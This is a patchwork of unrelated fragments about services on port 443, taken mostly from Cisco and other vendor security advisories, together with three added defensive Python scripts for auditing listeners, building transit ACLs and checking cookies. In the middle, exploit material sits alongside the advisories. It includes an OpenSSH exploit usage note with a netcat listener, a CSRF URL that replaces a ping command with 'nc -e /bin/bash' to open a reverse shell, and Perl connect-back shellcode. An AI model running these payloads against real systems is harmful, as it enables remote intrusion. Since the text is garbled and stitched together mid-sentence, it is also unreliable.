port 443
Clientless WebVPN, SSL VPN Client, and AnyConnect connections are
enabled via the webvpn command. For example, the following
configuration shows a Cisco ASA with WebVPN configured and enabled.
In this case the ASA will listen for WebVPN connections on the
default port, TCP port 443:
http server enable
!
webvpn
enable outside
Additional Information
======================
This response covers two separate cross-site scripting
vulnerabilities within the Cisco IOS Hypertext Transfer Protocol
(HTTP) server (including the HTTP secure server, hereafter referred to
simply as the HTTP server) and applies to all Cisco products that run
Cisco IOS Software versions 11.0 through 12.4 with the HTTP server
enabled. A system that contains the IOS HTTP server or HTTP secure
server, but does not have it enabled, is not affected.
A successful exploit could cause the web server to crash or allow the
attacker to execute arbitrary code on the server. Any code would
execute with system administrative privileges.
The vulnerability could be exploited over TCP port 443 or 1741.
Note: The default HTTP and HTTPS ports can be reconfigured on the
server.
The vulnerability affects both CiscoWorks Common Services for Oracle
Clientless WebVPN Connections
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Clientless WebVPN connections are enabled via the "webvpn" command. For
example, the following configuration shows an ASA running 8.0 software
with clientless WebVPN configured and enabled. In this case the ASA will
listen for WebVPN connections on the default port, TCP port 443:
http server enable
!
webvpn
enable outside
A number of sensitive Java Servlets delivered via a Java Servlet
framework within the Cisco TelePresence Recording Server could allow
a remote, unauthenticated attacker to perform actions that should be
restricted to administrative users. To successfully exploit this
vulnerability, the attacker would need the ability to submit a
crafted request to an affected device on TCP port 80, TCP port 443,
or TCP port 8080.
An attacker must perform a three-way TCP handshake and establish a
valid session to exploit these vulnerabilities.
The Cisco ASA is also vulnerable when the Cut-Through Proxy for
Network Access feature is used with HTTPS. This feature is enabled
for direct authentication using HTTPS with the "aaa authentication
listener https" command, as shown in the following example:
ASA(config)# aaa authentication listener https inside port 443
Session Initiation Protocol (SIP) Inspection Denial of Service Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A DoS vulnerability affects the SIP inspection feature of Cisco ASA
Cisco Response:
"Two separate Cisco IOS® Hypertext Transfer Protocol (HTTP) cross-site
scripting (XSS) vulnerabilities have been reported to Cisco [...]
===========
Filters such as Transit ACLs (tACLs) can be used to allow access to
the Administration Workstation from only trusted hosts.
Filters that deny HTTP packets using TCP port 1741 and HTTPS packets
using TCP port 443 should be deployed throughout the network as part
of a tACL policy to protect the network from traffic that enters the
network at ingress access points. This policy should be configured to
protect the network device where the filter is applied and other
devices that are behind it. Filters for HTTPS packets that use TCP
The following workarounds can be implemented.
Transit ACLs (tACL)
+------------------
Filters that deny HTTPS packets using TCP port 443 should be deployed
throughout the network as part of a tACL policy for protection of
traffic which enters the network at ingress access points. This policy
should be configured to protect the network device where the filter is
applied and other devices behind it. Filters for HTTPS packets using
TCP port 443 should also be deployed in front of vulnerable network
following example shows a vulnerable device configured with Cisco IOS
SSLVPN:
Router# show running | section webvpn
webvpn gateway Gateway
ip address 10.1.1.1 port 443
ssl trustpoint Gateway-TP
inservice
!
Router#
>> Year 2011
>>
>> Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
>> Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924
>> run like ./ssh -1 -z <yourip> <target>
>> setup a netcat, port 443 on yourip first
>>
>> a statically linked linux binary of the exploit can be found below
>> attached is a diff to openssh-5.8p2.
>>
>> the statically linked binary can be downloaded from
===========
General Considerations
+---------------------
Filters that deny HTTPS packets using TCP port 443 and MGCP packets on
UDP port 2427 should be deployed throughout the network as part of a
transit ACL (tACL) policy for protection of traffic which enters the
network at ingress access points. This policy should be configured to
protect the network device where the filter is applied and other devices
behind it. Filters for HTTPS packets using TCP port 443 and MGCP packets
Clientless VPN, SSL VPN Client, and AnyConnect connections are
enabled via the webvpn command. For example, the following
configuration shows a Cisco ASA with Clientless VPNs configured and
enabled. In this case the ASA will listen for VPN connections on the
default port, TCP port 443:
http server enable
!
webvpn
enable outside
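Every configuration snippet on this page (the ASA "webvpn" / "enable outside" stanza, the ASA "aaa authentication listener https" command, and the IOS "webvpn gateway" output shown further up) opens a TLS listener on TCP 443 unless a different port is configured. As an added example that is not taken from any of the quoted advisories, the Python below parses such a configuration and lists the listeners, so the exposure can be confirmed before deciding whether a given workaround applies. The two sample configurations are constructed for the example (the "Staging" gateway without "inservice" is invented to show that inactive gateways are skipped), and the "port" sub-command under the ASA "webvpn" mode is assumed from the advisories' note that the default port can be reconfigured.

```python
"""Audit a Cisco ASA or IOS running-config for TLS listeners on TCP 443.

Constructed for this example: the sample configs below and the
"Staging" gateway. Default: WebVPN / SSL VPN listens on TCP 443 unless
a "port" is given (assumption based on the advisories' wording).
"""
import re

DEFAULT_TLS_PORT = 443

# Sample inputs, constructed for the example (sub-commands indented one
# space as in real show-running output; the copies on this page lost that).
ASA_SAMPLE = """\
http server enable
!
webvpn
 enable outside
!
aaa authentication listener https inside port 443
"""

IOS_SAMPLE = """\
Router# show running | section webvpn
webvpn gateway Gateway
 ip address 10.1.1.1 port 443
 ssl trustpoint Gateway-TP
 inservice
!
webvpn gateway Staging
 ip address 10.1.1.2 port 8443
 ssl trustpoint Gateway-TP
!
Router#
"""


def _stanzas(config_text):
    """Yield (top-level command, [indented sub-commands]) pairs.

    A line at column 0 starts a new stanza; '!' or a blank line ends one.
    Prompt lines such as 'Router#' simply become stanzas nothing matches.
    """
    header, body = None, []
    for raw in config_text.splitlines():
        if not raw.strip() or raw.startswith("!"):
            if header is not None:
                yield header, body
            header, body = None, []
        elif raw[0].isspace():
            if header is not None:
                body.append(raw.strip())
        else:
            if header is not None:
                yield header, body
            header, body = raw.strip(), []
    if header is not None:
        yield header, body


def find_tls_listeners(config_text):
    """Return a list of {'kind', 'where', 'port'} for every active TLS listener.

    Only top-level stanzas are examined; the per-group-policy 'webvpn'
    sub-mode on ASA does not open a listener and is ignored.
    """
    found = []
    for header, body in _stanzas(config_text):
        # ASA: 'webvpn' mode with 'enable <iface>' and optional 'port N'
        if header == "webvpn":
            port, ifaces = DEFAULT_TLS_PORT, []
            for line in body:
                m = re.match(r"port (\d+)$", line)
                if m:
                    port = int(m.group(1))
                m = re.match(r"enable (\S+)$", line)
                if m:
                    ifaces.append(m.group(1))
            found.extend({"kind": "asa-webvpn", "where": i, "port": port}
                         for i in ifaces)
            continue
        # IOS: 'webvpn gateway NAME' with 'ip address A.B.C.D [port N]',
        # active only when 'inservice' is present
        m = re.match(r"webvpn gateway (\S+)$", header)
        if m:
            addr, port, active = None, DEFAULT_TLS_PORT, False
            for line in body:
                a = re.match(r"ip address (\S+)(?: port (\d+))?$", line)
                if a:
                    addr = a.group(1)
                    port = int(a.group(2)) if a.group(2) else port
                active = active or line == "inservice"
            if active:
                found.append({"kind": "ios-sslvpn-gateway",
                              "where": f"{m.group(1)}@{addr}", "port": port})
            continue
        # ASA cut-through proxy: one-line command, default port 443
        m = re.match(r"aaa authentication listener https (\S+)(?: port (\d+))?", header)
        if m:
            found.append({"kind": "asa-aaa-listener", "where": m.group(1),
                          "port": int(m.group(2)) if m.group(2) else DEFAULT_TLS_PORT})
    return found


if __name__ == "__main__":
    for sample in (ASA_SAMPLE, IOS_SAMPLE):
        for f in find_tls_listeners(sample):
            print(f"{f['kind']:22} {f['where']:22} tcp/{f['port']}")
```

Feed it the output of "show running-config" (ASA) or "show running | section webvpn" (IOS); anything it reports is a listener that the tACL filters described on this page need to cover.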
CVE-2011-4202 to this issue.
=====================================================================
Impact:
Anyone who is able to connect to Restorepoint on port 443 between powering up
the appliance and before the appliance is license activated is able to obtain
root level shell access to the appliance.
The Restorepoint appliance is used to back up the configurations of network
devices and as such, the Restorepoint appliance holds credentials for all the
hierarchy will have correct permissions. Filters such as Transit ACLs
can then be used to allow access to the Administration Workstation
from only the trusted hosts.
Filters that deny HTTP packets using TCP port 80 and HTTPS packets
using TCP port 443 should be deployed throughout the network as part
of a tACL policy for protection of traffic that enters the network at
ingress access points. This policy should be configured to protect
the network device where the filter is applied and other devices
behind it. Filters for HTTP packets using TCP port 80 and HTTPS
packets using TCP port 443 should also be deployed in front of
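The tACL passages above (TCP 443 and 1741 for CiscoWorks, TCP 443 plus UDP 2427 for the MGCP case, TCP 80 and 443 here) all describe the same policy: management protocols may reach infrastructure addresses only from trusted administration hosts, everything else to those ports is dropped at the ingress edge, and transit traffic is left alone. As an added example that is not part of any of the quoted advisories, the Python below builds such a policy, renders it as an IOS extended ACL, and evaluates sample packets against it with first-match semantics, so the rule order can be checked before the ACL is applied inbound on an ingress interface. The addresses, ACL name and trusted-host list are constructed for the example; the port list is the one the advisories name.

```python
"""Build and check a transit ACL (tACL) of the kind these advisories
recommend: management protocols to infrastructure address space are
allowed only from trusted administration hosts and dropped from
everywhere else, while ordinary transit traffic is left alone.

Addresses, the ACL name and the trusted-host list are constructed for
the example. Ports follow the advisories on this page: TCP 80/443 (HTTP
and HTTPS), TCP 1741 (CiscoWorks HTTP) and UDP 2427 (MGCP).
"""
import ipaddress

TRUSTED_MGMT = ["192.0.2.10/32", "192.0.2.11/32"]  # assumed admin workstations
INFRA_SPACE = ["10.1.1.0/24"]                      # assumed device addresses
MGMT_PORTS = [("tcp", 80), ("tcp", 443), ("tcp", 1741), ("udp", 2427)]
ANY = "0.0.0.0/0"


def build_tacl(trusted, infra, ports):
    """Return ordered rules as (action, proto, src_net, dst_net, dst_port).

    Order matters: IOS ACLs are first-match, so the trusted-host permits
    must precede the catch-all deny for each port.
    """
    rules = []
    for proto, port in ports:
        for dst in infra:
            for src in trusted:
                rules.append(("permit", proto, src, dst, port))
            rules.append(("deny", proto, ANY, dst, port))
    rules.append(("permit", "ip", ANY, ANY, None))  # transit traffic
    return rules


def _ios_addr(net):
    """Render a network in IOS ACL syntax (any / host X / net wildcard)."""
    n = ipaddress.ip_network(net)
    if n.prefixlen == 0:
        return "any"
    if n.prefixlen == n.max_prefixlen:
        return f"host {n.network_address}"
    return f"{n.network_address} {n.hostmask}"  # IOS uses wildcard masks


def render_ios(name, rules):
    """Render the rules as an IOS extended named ACL."""
    lines = [f"ip access-list extended {name}"]
    for action, proto, src, dst, port in rules:
        line = f" {action} {proto} {_ios_addr(src)} {_ios_addr(dst)}"
        if port is not None:
            line += f" eq {port}"
        lines.append(line)
    return "\n".join(lines)


def evaluate(rules, proto, src_ip, dst_ip, dst_port):
    """First-match evaluation of one packet; implicit deny at the end."""
    src, dst = ipaddress.ip_address(src_ip), ipaddress.ip_address(dst_ip)
    for action, rproto, rsrc, rdst, rport in rules:
        if rproto != "ip" and rproto != proto:
            continue
        if src not in ipaddress.ip_network(rsrc) or dst not in ipaddress.ip_network(rdst):
            continue
        if rport is not None and rport != dst_port:
            continue
        return action
    return "deny"


if __name__ == "__main__":
    rules = build_tacl(TRUSTED_MGMT, INFRA_SPACE, MGMT_PORTS)
    print(render_ios("tACL-Policy", rules))
    for pkt in [("tcp", "198.51.100.7", "10.1.1.1", 443),   # untrusted -> device
                ("tcp", "192.0.2.10", "10.1.1.1", 443),     # admin host -> device
                ("tcp", "198.51.100.7", "203.0.113.9", 443)]:  # transit
        print(pkt, "->", evaluate(rules, *pkt))
```

Note that the final "permit ip any any" keeps this to the minimum the advisories describe; a production tACL would normally also restrict the remaining protocols destined to the infrastructure space, and the filter must be applied inbound on the ingress interface, since it only protects the device it is applied to and the devices behind it.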
Multiple CGI command injection vulnerabilities exist in Cisco
TelePresence endpoint devices that could allow a remote,
authenticated attacker to execute arbitrary commands with elevated
privileges. To exploit these vulnerabilities, an attacker must submit
a malformed request to an affected device via TCP port 443.
An attacker must perform a three-way TCP handshake and establish a
valid session to exploit these vulnerabilities:
* Cisco TelePresence endpoint - CSCtb31685 ( registered customers
This vulnerability allows remote attackers to execute arbitrary commands
on vulnerable installations of Oracle Secure Backup. Authentication is
required to exploit it.
The specific flaws exist due to how the application passes CGI
parameters to the internal obtool binary running on port 443. Due to
improper filtering of user data a specially crafted request could lead
to arbitrary commands being executed under the credentials of the
service.
-- Vendor Response:
Cisco Secure ACS provides an optional User Change Password (UCP) web
service. Customers can implement the UCP functionality through either
a web-based front-end application or a scripting interface. In either
case, the computer that offers the UCP services to clients needs
access to TCP port 443 on the ACS server in order to perform such
password changes. Because this access would allow exploitation of the
vulnerability described in this advisory, both of the following
recommendations apply:
* Stop providing UCP services
Exploitation allows an attacker to cause a denial of service condition
or potentially execute arbitrary code with SYSTEM privileges.
In order to exploit this vulnerability, an attacker must be able to
establish a session on TCP port 443 with the target machine. No credentials
are required to trigger the vulnerable code path.
IV. DETECTION
iDefense has confirmed the existence of this vulnerability in IBM Tivoli
Advisory by Cisco was published a few days ago (Bugtraq ID: 48810).
Now more details:
1. Unauthenticated access to web management (any user, including admin).
Due to a blind SQL injection in the login form of the web management
interface (port 443, HTTPS, login field, embedded SQLite DB), it is possible to obtain:
a) all logins
b) all passwords (which are kept in the DB in plaintext)
c) other data stored in internal DB
boolean=True&manage_editUserSettings:method=Save&netMapStartObject=&pager=&
password=letmein&sndpassword=letmein&zenScreenName=editUserSettings
2. Change and execute a command CSRF.
Change the ping command to a netcat reverse shell to a remote system, in
this case an internal system listening on port 443:
http://172.16.28.5:8080/zport/dmd/userCommands/ping?command:text=nc -e
/bin/bash 172.16.28.6 443&commandId=ping&description:text=&
manage_editUserCommand:method=Save&zenScreenName=userCommandDetail
Details
=======
The Cisco Physical Access Gateway is the primary means for the Cisco
Physical Access Control solution to connect door hardware, such as
locks and readers, to an IP network. Certain crafted TCP port 443
packets may cause a memory leak that could lead to a denial of
service (DoS) condition in the Cisco Physical Access Gateway. A TCP
three-way handshake is needed to exploit this vulnerability.
This vulnerability is documented in Cisco Bug ID CSCsu95864 and has
could allow the attacker to modify agent policies and system
configuration and perform other administrative tasks.
Note: This vulnerability can be exploited only by sending certain
packets to the web management interface, which by default listens on
TCP port 443.
This vulnerability is documented in Cisco Bug ID CSCtj51216
and has been assigned the Common Vulnerabilities and Exposures (CVE)
identifier CVE-2011-0364.
use IO::Socket;
$|=1;
#freebsd reverse shell port 443
#setup a netcat on this port ^^
$bsdcbsc =
# setreuid, no root here
"\x31\xc0\x31\xc0\x50\x31\xc0\x50\xb0\x7e\x50\xcd\x80".
# connect back :>
compromise computers attached to the kvm switch.
Severity: Medium
CVE-2009-1474: Session ID Cookie not secure-only
When the user connects to the device via HTTP on port 80, the device
redirects the user to the same device on port 443 (HTTPS). There the
user logs in and gets a session ID cookie. However, this cookie does
not carry the Secure attribute specified in RFC 2109. When the user
goes back to HTTP for any reason, an attacker can sniff the session
ID. Using this session ID it is possible to download the Windows/Java
client program (which contains authentication data) and then access
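The cookie problem above is easy to check for from a captured response. As an added example, not code from the advisory or the vendor, the Python below parses a Set-Cookie header, reports a missing Secure (and HttpOnly) attribute, and predicts whether a browser would attach the cookie to an HTTP request, which is exactly the condition that lets the session ID be sniffed when the user goes back to port 80. The header values, cookie name and host name are constructed for the example; the "fixed" cookie is what a corrected device would return.

```python
"""Check a Set-Cookie header for the Secure (and HttpOnly) attributes and
predict whether a browser would send the cookie on a given URL.

The header values and URLs are constructed for the example; the cookie
name and value are made up.
"""
from urllib.parse import urlsplit

# Constructed: what the device described above returns after login
# (Secure missing) and what a fixed device would return.
WEAK_COOKIE = "SESSIONID=8d3f0c2a7b; Path=/"
FIXED_COOKIE = "SESSIONID=8d3f0c2a7b; Path=/; Secure; HttpOnly"


def parse_set_cookie(header_value):
    """Split 'name=value; Attr; Attr=val' into name, value and a dict of
    lower-cased attributes (value-less attributes map to True)."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def cookie_findings(header_value):
    """Return the list of problems with a session cookie (empty if none)."""
    attrs = parse_set_cookie(header_value)["attrs"]
    findings = []
    if "secure" not in attrs:
        findings.append("missing Secure: sent over plain HTTP too")
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: readable from script")
    return findings


def would_be_sent(header_value, url):
    """Would a browser attach this cookie to a request for url?

    Only the scheme and path rules are modelled; the cookie is assumed to
    have been set by the same host the url points at.
    """
    attrs = parse_set_cookie(header_value)["attrs"]
    parts = urlsplit(url)
    if "secure" in attrs and parts.scheme != "https":
        return False
    path = attrs.get("path", "/")
    if path is True:          # bare 'Path' with no value: treat as '/'
        path = "/"
    return (parts.path or "/").startswith(path)


if __name__ == "__main__":
    for label, cookie in (("weak", WEAK_COOKIE), ("fixed", FIXED_COOKIE)):
        print(label, cookie_findings(cookie) or "ok",
              "| sent over http:", would_be_sent(cookie, "http://kvm.example/"))
```

The weak cookie is reported as sent over "http://kvm.example/", the fixed one is not; the redirect from port 80 to 443 does nothing to prevent the leak, only the Secure attribute does.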
vulnerabilities before permitting access to the network. You can use
the NAC Manager server and its web-based administration console to
manage multiple NAC Appliances in a deployment.
Cisco NAC Manager contains a directory traversal vulnerability. The
management interface uses TCP port 443. An unauthenticated attacker
could exploit this vulnerability to access sensitive information,
including password files and system logs, that could be leveraged to
launch subsequent attacks. This vulnerability is documented in Cisco bug
ID CSCtq10755 and has been assigned Common Vulnerabilities and Exposures
(CVE) ID CVE-2011-3305.
not required to exploit this vulnerability but an attacker must be
authenticated.
The specific flaw exists in the handling of various variables to the
script property_box.php used in the administration server running on
port 443. Due to improper filtering of user data a specially crafted
request could lead to arbitrary commands being executed under the
credentials of the SYSTEM account.
-- Vendor Response:
Oracle has issued an update to correct this vulnerability. More
WebVPN DTLS Denial of Service Vulnerability
+------------------------------------------
Cisco ASA 5500 Series Adaptive Security Appliances are affected by a
vulnerability that may cause the appliance to reload when a malformed
DTLS message is sent to the DTLS port (by default UDP port 443).
Appliances are only vulnerable when they are configured for WebVPN and
DTLS transport.
This vulnerability is only triggered by traffic that is destined to the
appliance; transit traffic will not trigger the vulnerability.